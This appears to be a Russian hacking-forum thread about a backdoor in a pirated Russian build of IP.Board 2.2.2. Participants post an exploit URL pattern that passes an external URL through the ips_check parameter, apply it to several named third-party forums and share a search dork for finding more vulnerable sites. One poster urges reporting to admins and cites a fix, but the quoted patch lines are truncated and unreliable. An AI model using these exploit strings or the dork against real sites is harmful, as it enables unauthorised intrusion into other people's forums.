|
Бэкдор в Ipb 2.2.2 (Русская пиратская версия)
Сегодня изучал свой форум на предмет пхп иньекций и наткнулся на бэкдор.. погуглил немного и нашел в сети еше штук 30 таких форумов..
Как я понял его просто кто-то всунул туда и стал распространять... В общем работает тока на IPB 2.2.2 Русская версия (и то не на всех) Код:
http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL] |
Работает не везде...
Просто надо качать нуллы от русского офф.сайта поддержки Ipb |
Не тока в левых Ipb такое есть...
|
Shram-spb напиши плз форум где работает для теста.
|
Код:
http://vsecrazy.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[url] |
Не работает сайт можно ешё 1 плз.
|
Цитата:
Вот еще парочка. Код:
http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]Код:
http://www.forum.partisans.com.ua/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL] |
Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
|
Написано же
Цитата:
Вот пример: Код:
http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://forum.antichat.ru/showthread.php |
Цитата:
Код:
dork: "Русская версия IP.Board 2.2.2 © 2007 IPS, Inc."Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил.. Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит.. Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так: /source/action_public/profile.php строка 885: Код:
if ( $chk )Код:
if ( $chk ) |
| Время: 01:17 |